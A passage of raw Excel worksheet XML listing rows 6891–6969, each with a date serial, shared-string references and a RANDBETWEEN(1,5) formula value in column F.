        <v>43425.248287037037</v>
      </c>
      <c r="C6891" t="s">
        <v>41</v>
      </c>
      <c r="E6891" s="2" t="s">
        <v>6119</v>
      </c>
      <c r="F6891">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6892" s="1">
        <v>43425.247303240743</v>
      </c>
      <c r="C6892" t="s">
        <v>48</v>
      </c>
      <c r="E6892" t="s">
        <v>6120</v>
      </c>
      <c r="F6892">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6893" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6893" s="1">
        <v>43425.220543981479</v>
      </c>
      <c r="C6893" t="s">
        <v>41</v>
      </c>
      <c r="E6893" s="2" t="s">
        <v>6121</v>
      </c>
      <c r="F6893">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6894" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6894" s="1">
        <v>43425.219293981485</v>
      </c>
      <c r="C6894" t="s">
        <v>124</v>
      </c>
      <c r="E6894" t="s">
        <v>6122</v>
      </c>
      <c r="F6894">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6895" s="1">
        <v>43425.199444444443</v>
      </c>
      <c r="C6895" t="s">
        <v>328</v>
      </c>
      <c r="E6895" t="s">
        <v>6123</v>
      </c>
      <c r="F6895">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6896" s="1">
        <v>43425.177800925929</v>
      </c>
      <c r="C6896" t="s">
        <v>10</v>
      </c>
      <c r="D6896" t="s">
        <v>36</v>
      </c>
      <c r="E6896" t="s">
        <v>6124</v>
      </c>
      <c r="F6896">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6897" s="1">
        <v>43425.169224537036</v>
      </c>
      <c r="C6897" t="s">
        <v>41</v>
      </c>
      <c r="E6897" t="s">
        <v>6125</v>
      </c>
      <c r="F6897">
        <f t="shared" ca="1" si="107"/>
        <v>5</v>
      </c>
    </row>
    <row r="6898" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6898" s="1">
        <v>43425.167500000003</v>
      </c>
      <c r="C6898" t="s">
        <v>454</v>
      </c>
      <c r="E6898" s="2" t="s">
        <v>6126</v>
      </c>
      <c r="F6898">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6899" s="1">
        <v>43425.148020833331</v>
      </c>
      <c r="C6899" t="s">
        <v>48</v>
      </c>
      <c r="E6899" t="s">
        <v>6127</v>
      </c>
      <c r="F6899">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6900" s="1">
        <v>43425.141481481478</v>
      </c>
      <c r="C6900" t="s">
        <v>17</v>
      </c>
      <c r="E6900" t="s">
        <v>6128</v>
      </c>
      <c r="F6900">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6901" s="1">
        <v>43425.128657407404</v>
      </c>
      <c r="C6901" t="s">
        <v>197</v>
      </c>
      <c r="E6901" t="s">
        <v>6129</v>
      </c>
      <c r="F6901">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6902" s="1">
        <v>43425.115752314814</v>
      </c>
      <c r="C6902" t="s">
        <v>253</v>
      </c>
      <c r="E6902" t="s">
        <v>6130</v>
      </c>
      <c r="F6902">
        <f t="shared" ca="1" si="107"/>
        <v>5</v>
      </c>
    </row>
    <row r="6903" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6903" s="1">
        <v>43425.038414351853</v>
      </c>
      <c r="C6903" t="s">
        <v>10</v>
      </c>
      <c r="D6903" t="s">
        <v>381</v>
      </c>
      <c r="E6903" s="2" t="s">
        <v>6131</v>
      </c>
      <c r="F6903">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6904" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6904" s="1">
        <v>43425.008402777778</v>
      </c>
      <c r="C6904" t="s">
        <v>318</v>
      </c>
      <c r="E6904" s="2" t="s">
        <v>6132</v>
      </c>
      <c r="F6904">
        <f t="shared" ca="1" si="107"/>
        <v>2</v>
      </c>
    </row>
    <row r="6905" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6905" s="1">
        <v>43424.968449074076</v>
      </c>
      <c r="C6905" t="s">
        <v>563</v>
      </c>
      <c r="E6905" t="s">
        <v>6133</v>
      </c>
      <c r="F6905">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6906" s="1">
        <v>43424.911400462966</v>
      </c>
      <c r="C6906" t="s">
        <v>102</v>
      </c>
      <c r="D6906" t="s">
        <v>1091</v>
      </c>
      <c r="E6906" t="s">
        <v>6134</v>
      </c>
      <c r="F6906">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6907" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6907" s="1">
        <v>43424.910925925928</v>
      </c>
      <c r="C6907" t="s">
        <v>1611</v>
      </c>
      <c r="D6907" t="s">
        <v>750</v>
      </c>
      <c r="E6907" t="s">
        <v>6134</v>
      </c>
      <c r="F6907">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6908" s="1">
        <v>43424.859340277777</v>
      </c>
      <c r="C6908" t="s">
        <v>139</v>
      </c>
      <c r="E6908" t="s">
        <v>6135</v>
      </c>
      <c r="F6908">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6909" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A6909" s="1">
        <v>43424.786979166667</v>
      </c>
      <c r="C6909" t="s">
        <v>140</v>
      </c>
      <c r="D6909" t="s">
        <v>141</v>
      </c>
      <c r="E6909" s="2" t="s">
        <v>6136</v>
      </c>
      <c r="F6909">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6910" s="1">
        <v>43424.771018518521</v>
      </c>
      <c r="C6910" t="s">
        <v>10</v>
      </c>
      <c r="D6910" t="s">
        <v>23</v>
      </c>
      <c r="E6910" t="s">
        <v>6137</v>
      </c>
      <c r="F6910">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6911" s="1">
        <v>43424.761296296296</v>
      </c>
      <c r="C6911" t="s">
        <v>10</v>
      </c>
      <c r="D6911" t="s">
        <v>107</v>
      </c>
      <c r="E6911" t="s">
        <v>6138</v>
      </c>
      <c r="F6911">
        <f t="shared" ca="1" si="107"/>
        <v>3</v>
      </c>
    </row>
    <row r="6912" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6912" s="1">
        <v>43424.734375</v>
      </c>
      <c r="C6912" t="s">
        <v>10</v>
      </c>
      <c r="D6912" t="s">
        <v>80</v>
      </c>
      <c r="E6912" s="2" t="s">
        <v>6139</v>
      </c>
      <c r="F6912">
        <f t="shared" ca="1" si="107"/>
        <v>4</v>
      </c>
    </row>
    <row r="6913" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6913" s="1">
        <v>43424.719560185185</v>
      </c>
      <c r="C6913" t="s">
        <v>10</v>
      </c>
      <c r="D6913" t="s">
        <v>107</v>
      </c>
      <c r="E6913" s="2" t="s">
        <v>6140</v>
      </c>
      <c r="F6913">
        <f t="shared" ca="1" si="107"/>
        <v>1</v>
      </c>
    </row>
    <row r="6914" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6914" s="1">
        <v>43424.706157407411</v>
      </c>
      <c r="C6914" t="s">
        <v>10</v>
      </c>
      <c r="D6914" t="s">
        <v>89</v>
      </c>
      <c r="E6914" s="2" t="s">
        <v>6141</v>
      </c>
      <c r="F6914">
        <f t="shared" ref="F6914:F6977" ca="1" si="108">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="6915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6915" s="1">
        <v>43424.684305555558</v>
      </c>
      <c r="C6915" t="s">
        <v>10</v>
      </c>
      <c r="D6915" t="s">
        <v>20</v>
      </c>
      <c r="E6915" t="s">
        <v>6142</v>
      </c>
      <c r="F6915">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6916" s="1">
        <v>43424.650567129633</v>
      </c>
      <c r="C6916" t="s">
        <v>2104</v>
      </c>
      <c r="E6916" t="s">
        <v>6143</v>
      </c>
      <c r="F6916">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6917" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6917" s="1">
        <v>43424.647152777776</v>
      </c>
      <c r="C6917" t="s">
        <v>10</v>
      </c>
      <c r="D6917" t="s">
        <v>6</v>
      </c>
      <c r="E6917" s="2" t="s">
        <v>6144</v>
      </c>
      <c r="F6917">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6918" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6918" s="1">
        <v>43424.64402777778</v>
      </c>
      <c r="C6918" t="s">
        <v>10</v>
      </c>
      <c r="D6918" t="s">
        <v>89</v>
      </c>
      <c r="F6918">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6919" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6919" s="1">
        <v>43424.629594907405</v>
      </c>
      <c r="C6919" t="s">
        <v>69</v>
      </c>
      <c r="E6919" s="2" t="s">
        <v>6145</v>
      </c>
      <c r="F6919">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6920" s="1">
        <v>43424.628344907411</v>
      </c>
      <c r="C6920" t="s">
        <v>10</v>
      </c>
      <c r="D6920" t="s">
        <v>178</v>
      </c>
      <c r="E6920" t="s">
        <v>6146</v>
      </c>
      <c r="F6920">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6921" s="1">
        <v>43424.611354166664</v>
      </c>
      <c r="C6921" t="s">
        <v>10</v>
      </c>
      <c r="D6921" t="s">
        <v>6</v>
      </c>
      <c r="E6921" t="s">
        <v>6147</v>
      </c>
      <c r="F6921">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6922" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6922" s="1">
        <v>43424.608298611114</v>
      </c>
      <c r="C6922" t="s">
        <v>10</v>
      </c>
      <c r="D6922" t="s">
        <v>6</v>
      </c>
      <c r="E6922" t="s">
        <v>6148</v>
      </c>
      <c r="F6922">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6923" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6923" s="1">
        <v>43424.596076388887</v>
      </c>
      <c r="C6923" t="s">
        <v>559</v>
      </c>
      <c r="E6923" s="2" t="s">
        <v>6149</v>
      </c>
      <c r="F6923">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6924" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6924" s="1">
        <v>43424.596030092594</v>
      </c>
      <c r="C6924" t="s">
        <v>559</v>
      </c>
      <c r="E6924" s="2" t="s">
        <v>6149</v>
      </c>
      <c r="F6924">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6925" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6925" s="1">
        <v>43424.569386574076</v>
      </c>
      <c r="C6925" t="s">
        <v>6</v>
      </c>
      <c r="D6925" t="s">
        <v>194</v>
      </c>
      <c r="E6925" s="2" t="s">
        <v>6150</v>
      </c>
      <c r="F6925">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6926" s="1">
        <v>43424.560081018521</v>
      </c>
      <c r="C6926" t="s">
        <v>10</v>
      </c>
      <c r="D6926" t="s">
        <v>6</v>
      </c>
      <c r="E6926" t="s">
        <v>6151</v>
      </c>
      <c r="F6926">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6927" s="1">
        <v>43424.525393518517</v>
      </c>
      <c r="C6927" t="s">
        <v>6</v>
      </c>
      <c r="D6927" t="s">
        <v>25</v>
      </c>
      <c r="E6927" t="s">
        <v>6152</v>
      </c>
      <c r="F6927">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6928" s="1">
        <v>43424.523668981485</v>
      </c>
      <c r="C6928" t="s">
        <v>6</v>
      </c>
      <c r="D6928" t="s">
        <v>114</v>
      </c>
      <c r="E6928" t="s">
        <v>6153</v>
      </c>
      <c r="F6928">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6929" s="1">
        <v>43424.509687500002</v>
      </c>
      <c r="C6929" t="s">
        <v>10</v>
      </c>
      <c r="D6929" t="s">
        <v>494</v>
      </c>
      <c r="E6929" t="s">
        <v>6154</v>
      </c>
      <c r="F6929">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6930" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6930" s="1">
        <v>43424.506932870368</v>
      </c>
      <c r="C6930" t="s">
        <v>10</v>
      </c>
      <c r="D6930" t="s">
        <v>271</v>
      </c>
      <c r="E6930" s="2" t="s">
        <v>6155</v>
      </c>
      <c r="F6930">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6931" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6931" s="1">
        <v>43424.506805555553</v>
      </c>
      <c r="C6931" t="s">
        <v>48</v>
      </c>
      <c r="E6931" s="2" t="s">
        <v>6156</v>
      </c>
      <c r="F6931">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6932" s="1">
        <v>43424.457881944443</v>
      </c>
      <c r="C6932" t="s">
        <v>10</v>
      </c>
      <c r="D6932" t="s">
        <v>41</v>
      </c>
      <c r="E6932" t="s">
        <v>6157</v>
      </c>
      <c r="F6932">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6933" s="1">
        <v>43424.446400462963</v>
      </c>
      <c r="C6933" t="s">
        <v>10</v>
      </c>
      <c r="D6933" t="s">
        <v>6</v>
      </c>
      <c r="E6933" t="s">
        <v>6158</v>
      </c>
      <c r="F6933">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6934" s="1">
        <v>43424.426446759258</v>
      </c>
      <c r="C6934" t="s">
        <v>6</v>
      </c>
      <c r="D6934" t="s">
        <v>25</v>
      </c>
      <c r="F6934">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6935" s="1">
        <v>43424.426168981481</v>
      </c>
      <c r="C6935" t="s">
        <v>10</v>
      </c>
      <c r="D6935" t="s">
        <v>89</v>
      </c>
      <c r="E6935" t="s">
        <v>6159</v>
      </c>
      <c r="F6935">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6936" s="1">
        <v>43424.411631944444</v>
      </c>
      <c r="C6936" t="s">
        <v>71</v>
      </c>
      <c r="E6936" t="s">
        <v>6160</v>
      </c>
      <c r="F6936">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6937" s="1">
        <v>43424.402777777781</v>
      </c>
      <c r="C6937" t="s">
        <v>10</v>
      </c>
      <c r="D6937" t="s">
        <v>14</v>
      </c>
      <c r="E6937" t="s">
        <v>6161</v>
      </c>
      <c r="F6937">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6938" s="1">
        <v>43424.39984953704</v>
      </c>
      <c r="C6938" t="s">
        <v>10</v>
      </c>
      <c r="D6938" t="s">
        <v>36</v>
      </c>
      <c r="E6938" t="s">
        <v>6162</v>
      </c>
      <c r="F6938">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6939" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A6939" s="1">
        <v>43424.394363425927</v>
      </c>
      <c r="C6939" t="s">
        <v>71</v>
      </c>
      <c r="E6939" s="2" t="s">
        <v>6163</v>
      </c>
      <c r="F6939">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6940" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6940" s="1">
        <v>43424.391469907408</v>
      </c>
      <c r="C6940" t="s">
        <v>776</v>
      </c>
      <c r="E6940" s="2" t="s">
        <v>6164</v>
      </c>
      <c r="F6940">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6941" s="1">
        <v>43424.377592592595</v>
      </c>
      <c r="C6941" t="s">
        <v>2986</v>
      </c>
      <c r="D6941" t="s">
        <v>721</v>
      </c>
      <c r="E6941" t="s">
        <v>6165</v>
      </c>
      <c r="F6941">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6942" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6942" s="1">
        <v>43424.36928240741</v>
      </c>
      <c r="C6942" t="s">
        <v>10</v>
      </c>
      <c r="D6942" t="s">
        <v>244</v>
      </c>
      <c r="E6942" s="2" t="s">
        <v>6166</v>
      </c>
      <c r="F6942">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6943" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6943" s="1">
        <v>43424.348217592589</v>
      </c>
      <c r="C6943" t="s">
        <v>10</v>
      </c>
      <c r="D6943" t="s">
        <v>290</v>
      </c>
      <c r="E6943" t="s">
        <v>6167</v>
      </c>
      <c r="F6943">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6944" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6944" s="1">
        <v>43424.320509259262</v>
      </c>
      <c r="C6944" t="s">
        <v>10</v>
      </c>
      <c r="D6944" t="s">
        <v>71</v>
      </c>
      <c r="E6944" t="s">
        <v>6168</v>
      </c>
      <c r="F6944">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6945" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6945" s="1">
        <v>43424.319340277776</v>
      </c>
      <c r="C6945" t="s">
        <v>71</v>
      </c>
      <c r="E6945" s="2" t="s">
        <v>6169</v>
      </c>
      <c r="F6945">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6946" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6946" s="1">
        <v>43424.290347222224</v>
      </c>
      <c r="C6946" t="s">
        <v>50</v>
      </c>
      <c r="E6946" s="2" t="s">
        <v>6170</v>
      </c>
      <c r="F6946">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6947" s="1">
        <v>43424.264409722222</v>
      </c>
      <c r="C6947" t="s">
        <v>43</v>
      </c>
      <c r="E6947" t="s">
        <v>6171</v>
      </c>
      <c r="F6947">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6948" s="1">
        <v>43424.231944444444</v>
      </c>
      <c r="C6948" t="s">
        <v>41</v>
      </c>
      <c r="E6948" t="s">
        <v>6172</v>
      </c>
      <c r="F6948">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6949" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6949" s="1">
        <v>43424.212650462963</v>
      </c>
      <c r="C6949" t="s">
        <v>1080</v>
      </c>
      <c r="E6949" s="2" t="s">
        <v>6173</v>
      </c>
      <c r="F6949">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6950" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A6950" s="1">
        <v>43424.172326388885</v>
      </c>
      <c r="C6950" t="s">
        <v>907</v>
      </c>
      <c r="E6950" s="2" t="s">
        <v>6174</v>
      </c>
      <c r="F6950">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6951" s="1">
        <v>43424.153969907406</v>
      </c>
      <c r="C6951" t="s">
        <v>73</v>
      </c>
      <c r="E6951" t="s">
        <v>6175</v>
      </c>
      <c r="F6951">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6952" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6952" s="1">
        <v>43424.112708333334</v>
      </c>
      <c r="C6952" t="s">
        <v>41</v>
      </c>
      <c r="E6952" s="2" t="s">
        <v>6176</v>
      </c>
      <c r="F6952">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6953" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A6953" s="1">
        <v>43424.08384259259</v>
      </c>
      <c r="C6953" t="s">
        <v>10</v>
      </c>
      <c r="D6953" t="s">
        <v>222</v>
      </c>
      <c r="E6953" s="2" t="s">
        <v>6177</v>
      </c>
      <c r="F6953">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6954" s="1">
        <v>43424.077662037038</v>
      </c>
      <c r="C6954" t="s">
        <v>60</v>
      </c>
      <c r="E6954" t="s">
        <v>6178</v>
      </c>
      <c r="F6954">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6955" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A6955" s="1">
        <v>43424.063611111109</v>
      </c>
      <c r="C6955" t="s">
        <v>41</v>
      </c>
      <c r="D6955" t="s">
        <v>312</v>
      </c>
      <c r="E6955" s="2" t="s">
        <v>6179</v>
      </c>
      <c r="F6955">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6956" s="1">
        <v>43423.989861111113</v>
      </c>
      <c r="C6956" t="s">
        <v>41</v>
      </c>
      <c r="E6956" t="s">
        <v>6180</v>
      </c>
      <c r="F6956">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6957" s="1">
        <v>43423.91846064815</v>
      </c>
      <c r="C6957" t="s">
        <v>2986</v>
      </c>
      <c r="D6957" t="s">
        <v>107</v>
      </c>
      <c r="E6957" t="s">
        <v>6165</v>
      </c>
      <c r="F6957">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6958" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A6958" s="1">
        <v>43423.904305555552</v>
      </c>
      <c r="C6958" t="s">
        <v>319</v>
      </c>
      <c r="D6958" t="s">
        <v>6181</v>
      </c>
      <c r="E6958" s="2" t="s">
        <v>6182</v>
      </c>
      <c r="F6958">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6959" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A6959" s="1">
        <v>43423.819502314815</v>
      </c>
      <c r="C6959" t="s">
        <v>10</v>
      </c>
      <c r="D6959" t="s">
        <v>112</v>
      </c>
      <c r="E6959" s="2" t="s">
        <v>6183</v>
      </c>
      <c r="F6959">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6960" s="1">
        <v>43423.761990740742</v>
      </c>
      <c r="C6960" t="s">
        <v>10</v>
      </c>
      <c r="D6960" t="s">
        <v>52</v>
      </c>
      <c r="F6960">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6961" s="1">
        <v>43423.758796296293</v>
      </c>
      <c r="C6961" t="s">
        <v>10</v>
      </c>
      <c r="D6961" t="s">
        <v>667</v>
      </c>
      <c r="E6961" t="s">
        <v>6184</v>
      </c>
      <c r="F6961">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6962" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A6962" s="1">
        <v>43423.732638888891</v>
      </c>
      <c r="C6962" t="s">
        <v>107</v>
      </c>
      <c r="E6962" s="2" t="s">
        <v>6185</v>
      </c>
      <c r="F6962">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6963" s="1">
        <v>43423.719884259262</v>
      </c>
      <c r="C6963" t="s">
        <v>10</v>
      </c>
      <c r="D6963" t="s">
        <v>33</v>
      </c>
      <c r="E6963" t="s">
        <v>6186</v>
      </c>
      <c r="F6963">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6964" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6964" s="1">
        <v>43423.686562499999</v>
      </c>
      <c r="C6964" t="s">
        <v>10</v>
      </c>
      <c r="D6964" t="s">
        <v>107</v>
      </c>
      <c r="E6964" s="2" t="s">
        <v>6187</v>
      </c>
      <c r="F6964">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6965" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A6965" s="1">
        <v>43423.679398148146</v>
      </c>
      <c r="C6965" t="s">
        <v>10</v>
      </c>
      <c r="D6965" t="s">
        <v>112</v>
      </c>
      <c r="E6965" s="2" t="s">
        <v>6188</v>
      </c>
      <c r="F6965">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6966" s="1">
        <v>43423.667326388888</v>
      </c>
      <c r="C6966" t="s">
        <v>10</v>
      </c>
      <c r="D6966" t="s">
        <v>6</v>
      </c>
      <c r="E6966" t="s">
        <v>6189</v>
      </c>
      <c r="F6966">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6967" s="1">
        <v>43423.638726851852</v>
      </c>
      <c r="C6967" t="s">
        <v>537</v>
      </c>
      <c r="D6967" t="s">
        <v>192</v>
      </c>
      <c r="E6967" t="s">
        <v>6190</v>
      </c>
      <c r="F6967">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6968" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6968" s="1">
        <v>43423.637488425928</v>
      </c>
      <c r="C6968" t="s">
        <v>10</v>
      </c>
      <c r="D6968" t="s">
        <v>89</v>
      </c>
      <c r="E6968" s="2" t="s">
        <v>6191</v>
      </c>
      <c r="F6968">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6969" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6969" s="1">
        <v>43423.606516203705</v>
      </c>
      <c r="C6969" t="s">
        <v>10</v>
      </c>
      <c r="D6969" t="s">
        <v>192</v>
      </c>
      <c r="E6969" s="2" t="s">
        <v>6192</v>
      </c>
      <c r="F6969">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
